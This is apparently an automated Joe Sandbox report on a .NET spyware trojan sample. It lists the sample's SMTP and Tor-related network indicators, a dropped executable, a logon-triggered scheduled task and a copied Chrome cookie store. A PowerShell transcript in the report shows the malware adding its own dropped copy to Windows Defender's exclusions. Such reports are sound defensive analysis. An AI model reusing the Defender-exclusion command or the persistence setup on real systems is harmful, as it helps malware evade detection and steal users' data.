                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      		208.91.199.223
                      		truefalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.103SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://api.ipify.org%GETMozilla/5.003SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://DynDns.comDynDNS03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://us2.smtp.mailhostbox.com03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921914863.0000000002F13000.00000004.00000001.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://1pbBaOuWGX2iibYLF.net03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921807859.0000000002EED000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921843959.0000000002EFB000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.921764899.0000000002EE5000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://GwvXXB.com03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpfalse
                            		high
                            https://api.ipify.org%03SPwb995m.exe, 00000008.00000002.919026964.0000000002B81000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		low
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip03SPwb995m.exe, 00000000.00000002.679115519.0000000003EAF000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000008.00000002.916977171.0000000000402000.00000040.00000001.sdmp, 03SPwb995m.exe, 00000008.00000000.673486986.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            208.91.199.223
                            		us2.smtp.mailhostbox.comUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                            208.91.199.224
                            		unknownUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:528805
                            Start date:25.11.2021
                            Start time:20:02:40
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:03SPwb995m (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:21
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@9/9@2/2
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 29
                            • Number of non-executed functions: 2
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            20:03:32API Interceptor699x Sleep call for process: 03SPwb995m.exe modified
                            20:03:39API Interceptor39x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            208.91.199.223Reconfirm The Details.docGet hashmaliciousBrowse
                              MT_101_SWIFT.docGet hashmaliciousBrowse
                                DOCUMENTS.exeGet hashmaliciousBrowse
                                  TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                    UY2021 Ta-Ho Maritime Schedule.exeGet hashmaliciousBrowse
                                      Purchase Order.exeGet hashmaliciousBrowse
                                        StK0hTNVyxxIPrJ.exeGet hashmaliciousBrowse
                                          daFT5cSayV.exeGet hashmaliciousBrowse
                                            devis.xlsxGet hashmaliciousBrowse
                                              DHL airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                                heKD0ElTBU.exeGet hashmaliciousBrowse
                                                  ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                    IMG-2021-15-11-OWA001.exeGet hashmaliciousBrowse
                                                      ox4RBMSG5L.exeGet hashmaliciousBrowse
                                                        DHL 7348255142.exeGet hashmaliciousBrowse
                                                          MhjOCUlq1RbHWCt.exeGet hashmaliciousBrowse
                                                            New Order-2021-PO#0834.exeGet hashmaliciousBrowse
                                                              RFQ.exeGet hashmaliciousBrowse
                                                                TEOpHaBEtDUCKRd.exeGet hashmaliciousBrowse
                                                                  PURCHASE ORDER.docGet hashmaliciousBrowse
                                                                    208.91.199.224PAGO DEL SALDO.docGet hashmaliciousBrowse
                                                                      MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                        Reconfirm The Details.docGet hashmaliciousBrowse
                                                                          Document.exeGet hashmaliciousBrowse
                                                                            MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                              ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                DOC221121.exeGet hashmaliciousBrowse
                                                                                  TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                    AWB Number 0004318855.DOCX.exeGet hashmaliciousBrowse
                                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                                        ORDER INQUIRY-PVP-SP-2021-56.exeGet hashmaliciousBrowse
                                                                                          PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                            vYeUxRnIbLKDudo.exeGet hashmaliciousBrowse
                                                                                              DHL Documentos de envio originales.exeGet hashmaliciousBrowse
                                                                                                pVLzns64XtYkuFT.exeGet hashmaliciousBrowse
                                                                                                  BOQ 11745692.exeGet hashmaliciousBrowse
                                                                                                    BOQ 11745692.exeGet hashmaliciousBrowse
                                                                                                      ADYP_210913_100641_PAGOS_005539.xlsxGet hashmaliciousBrowse
                                                                                                        gHs6ECUllmPgK2I.exeGet hashmaliciousBrowse
                                                                                                          RFQ.exeGet hashmaliciousBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            us2.smtp.mailhostbox.comnxHHI8WXqt.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            PAGO DEL SALDO.docGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Document.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            DOC221121.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Swift_HSBC_0099087645 xOJ4XUjdMZ40k5Hpdf.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            rTyPU1zmY5PsyNl.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            TransactionSummary_22-11-2021.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            E invoice.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223

                                                                                                            ASN

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            PUBLIC-DOMAIN-REGISTRYUSnxHHI8WXqt.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            PAGO DEL SALDO.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Document.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                            • 207.174.212.140
                                                                                                            MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            DOC221121.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                            • 103.50.163.110
                                                                                                            Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                            • 199.79.62.99
                                                                                                            E invoice.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            PUBLIC-DOMAIN-REGISTRYUSnxHHI8WXqt.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            PAGO DEL SALDO.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            MT_1O1_SWIFt.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Reconfirm The Details.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Document.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Swift Copy TT.docGet hashmaliciousBrowse
                                                                                                            • 207.174.212.140
                                                                                                            MT_101_SWIFT.docGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            ORDER INQUIRY-PVP-SP-2021-58.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            DOC221121.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224
                                                                                                            Swift_HSBC_0099087645PDF.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            P0_636732672772_RFQ.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.223
                                                                                                            Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                            • 103.50.163.110
                                                                                                            Purchase Order PO#7701.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.198.143
                                                                                                            STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            XsFFv27rls.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            TNT E-Invoice No 11073490.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                                            • 199.79.62.99
                                                                                                            E invoice.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.225
                                                                                                            TOP QUOTATION RFQ 2021.exeGet hashmaliciousBrowse
                                                                                                            • 208.91.199.224

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            C:\Users\user\AppData\Roaming\gZfDBpJYZ.exeReconfirm The Details.docGet hashmaliciousBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03SPwb995m.exe.log
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):1310
                                                                                                              Entropy (8bit):5.345651901398759
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                                                              MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                                                              SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                                                              SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                                                              SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                                                              Malicious:true
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):22368
                                                                                                              Entropy (8bit):5.601708622549626
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:2tCDtCeeXImY3nQUp+ncSBKn0jultIi/7Y9gxSJ3xST1MaDZlbAV7AriyZBDI+B0:W2mVUCc4K0Cltd7xcgCSfw8rVc
                                                                                                              MD5:4B4C0891EA65539D96F45DFE5033D622
                                                                                                              SHA1:4C68C339CAB34F2D6A7B748C7AF5C7003C644182
                                                                                                              SHA-256:15A1BE3CD4E18B9774AA7DFA6CF97696FF47C275BFB4D51A68D151F59F4848C0
                                                                                                              SHA-512:2FA4E20231B74AD677466A713CEF40AAFC0DFEEFA33A5F44F59344A5B5E73FE222EB3B36A3777035496E142DA61BEFF73D075DC28D9BD04B581AAC794BF8BD0D
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview: @...e...................h.".E.8.5.........I..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ks33pk2.inw.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frun4r5c.vwu.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1596
                                                                                                              Entropy (8bit):5.148940738524574
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaBxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuT4v
                                                                                                              MD5:6559A727DCAB13CBAB3D97E706C43B1B
                                                                                                              SHA1:4747A6D2674FC9EA3DB6EE83D3C6F2B144BDC06E
                                                                                                              SHA-256:0BC0C6681AAB8F0D889CDDB24AC2E725B1BEA9BB47912C597589FDDED659F15B
                                                                                                              SHA-512:262A1F7BD9CB90092FEAEFCF14426EF0301A0EC8F1139666E4CBCD7479C34CE92078CAFB07925581DC4F5F1E456A060F7A49A2D7E70A18881A3D78D9F6AC48CE
                                                                                                              Malicious:true
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):777216
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:rBzcmhiTcQfDYWTRCFySBx5CC6Z0KbS7gdqszdlLhrpGreLM8vZw+JS1nHLE2D2W:rBomhiQYYWEFyw5USIHLu4vG7Hc95i11
                                                                                                              MD5:815982590DE5E574ABB8A0310826E200
                                                                                                              SHA1:6C41343A2E25F932F901E53E615CC083209F6A65
                                                                                                              SHA-256:56960095EA2EDA1C680F9DF0937A792E9BCA7AF4922931540688097E6D2A43BB
                                                                                                              SHA-512:4C343183EC50C6887B758ED1FA40478BC87A0944792944D42C9978EBDA94B08A9D2E3E77B039963BF0A3EC2D5090BBB7FBA9CF0486EBE8C00AC393A2361FCE98
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Virustotal, Detection: 22%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Reconfirm The Details.doc, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..a..............0.................. ........@.. .......................@............@.................................\...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........H...!..........Lj................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........
                                                                                                              C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:false
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0
                                                                                                              C:\Users\user\AppData\Roaming\qjd4o4f4.25r\Chrome\Default\Cookies
                                                                                                              Process:C:\Users\user\Desktop\03SPwb995m.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.7006690334145785
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                                              MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                                              SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                                              SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                                              SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                                              Malicious:false
                                                                                                              Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\Documents\20211125\PowerShell_transcript.287400.wHqetafF.20211125200338.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5785
                                                                                                              Entropy (8bit):5.406946154604899
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZxj5NFqDo1Z5Zej5NFqDo1ZGqQCjZxj5NFqDo1ZVrSS5Zu:Z
                                                                                                              MD5:7B36232C034A7DE025889FAAB1C554E6
                                                                                                              SHA1:DE6A1B7FBC55790530B7EEA6F5504E1ECB0D5228
                                                                                                              SHA-256:C8D707AADE12C1B6A4B20AD335DB27F218843138DB93AB2A987C0553D2FEE5F8
                                                                                                              SHA-512:D0AED9613DEFF69B869E5F61A9A121C409824F7737F1E19CB5A1341E55EAFC81FE310BA9A92D845A7875A725C9D3E5B97E408DC920C9CB12CF886AC8798D350D
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125200339..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe..Process ID: 5776..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125200339..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe..**********************..Windows PowerShell transcript start..Start time: 20211125200707..Username: computer\user..RunAs User: computer\user.

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.787171245644076
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              File name:03SPwb995m.exe
                                                                                                              File size:777216
                                                                                                              MD5:815982590de5e574abb8a0310826e200
